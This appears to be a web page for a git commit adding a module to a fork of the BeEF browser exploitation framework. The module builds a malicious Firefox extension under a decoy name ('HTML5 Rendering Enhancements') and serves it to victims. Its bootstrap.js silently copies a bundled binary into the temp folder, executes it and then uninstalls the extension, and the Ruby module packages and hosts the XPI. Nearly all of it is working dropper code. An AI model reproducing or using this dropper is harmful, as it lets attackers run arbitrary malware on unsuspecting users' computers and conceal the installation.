Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

From antisnatchor with love. New module: malicious Firefox Extension dropper. Based on @mihi42 FF extension.

Browse Source
This commit is contained in:
antisnatchor
2013-10-10 15:18:03 +01:00
parent 45c51180a6
commit 5dd46ffd72
8 changed files with 210 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

39
modules/exploits/local_host/firefox_extension_dropper/command.js Normal file
View File

File diff suppressed because one or more lines are too long

16
modules/exploits/local_host/firefox_extension_dropper/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
firefox_extension_dropper:
enable: true
category: ["Exploits", "Local Host"]
name: "Firefox Extension Dropper"
description: "Create on the fly a malicious Firefox extension that embeds a dropper you can specify (add it to the 'dropper' directory). <br/><br/> The extension is based on the original work from Michael Schierl and his Metasploit module."
authors: ["antisnatchor"]
target:
user_notify: ["FF"]
not_working: ["All"]

2
modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt Normal file
View File

@@ -0,0 +1,2 @@
Place in this directory the binary you want to drop and execute through the Firefox extension.
Make sure to have just ONE file in this directory (other than this readme.txt).

30
modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js vendored Normal file
View File

@@ -0,0 +1,30 @@
function startup(data, reason) {
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";payload_name="__payload_placeholder__";
file.append(xpi_guid);
file.append(payload_name);
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("TmpD", Components.interfaces.nsIFile);
tmp.append(payload_name);
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
file.copyTo(tmp.parent, tmp.leafName);
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(tmp);
process.run(false,[],0);
try { // Fx < 4.0
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
}

2
modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest Normal file
View File

@@ -0,0 +1,2 @@
content {861fb387-92ce-bb0a-cb48-4b923dbc292b} ./
overlay chrome://browser/content/browser.xul chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul

24
modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf Normal file
View File

@@ -0,0 +1,24 @@
<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id>
<em:name>__extension_name_placeholder__</em:name>
<em:version>1.0</em:version>
<em:bootstrap>true</em:bootstrap>
<em:unpack>true</em:unpack>
<em:targetApplication>
<Description>
<em:id>toolkit@mozilla.org</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>

5
modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul Normal file
View File

@@ -0,0 +1,5 @@
<?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="bootstrap.js"/>
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
</overlay>

92
modules/exploits/local_host/firefox_extension_dropper/module.rb Normal file
View File

@@ -0,0 +1,92 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Firefox_extension_dropper < BeEF::Core::Command
class Bind_extension < BeEF::Core::Router::Router
before do
headers 'Content-Type' => 'application/x-xpinstall',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
get '/' do
response['Content-Type'] = "application/x-xpinstall"
extension_path = settings.extension_path
print_info "Serving malicious Firefox Extension Dropper: #{extension_path}"
send_file "#{extension_path}",
:type => 'application/x-xpinstall',
:disposition => 'inline'
end
end
def pre_send
# gets the value configured in the module configuration by the user
@datastore.each do |input|
if input['name'] == "extension_name"
@extension_name = input['value']
end
if input['name'] == "xpi_name"
@xpi_name = input['value']
end
end
mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper"
extension_path = mod_path + "/extension"
# retrieve the name of the dropper binary
Dir.foreach("#{mod_path}/dropper") do |item|
if item != "readme.txt" && item != "." && item != ".."
@dropper = item
puts "dropper: " + @dropper
end
end
# clean the build directory
FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
# copy in the build directory necessary file, substituting placeholders
File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__payload_placeholder__", @dropper)}
File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")}
File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
FileUtils.cp "#{mod_path}/dropper/#{@dropper}", "#{extension_path}/build/#{@dropper}"
extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest", @dropper]
# create the XPI extension container
xpi = "#{extension_path}/#{@xpi_name}.xpi"
if File.exist?(xpi)
File.delete(xpi)
end
Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
extension_content.each do |filename|
xpi.add(filename, "#{extension_path}/build/#{filename}")
end
end
# mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
bind_extension = Firefox_extension_dropper::Bind_extension
bind_extension.set :extension_path, "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper/extension/#{@xpi_name}.xpi"
BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
BeEF::Core::Server.instance.remap
end
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
return [
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
{'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
{'name' => 'domain', 'ui_label' => 'Serving Domain', 'value' => 'http://beefdomain'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end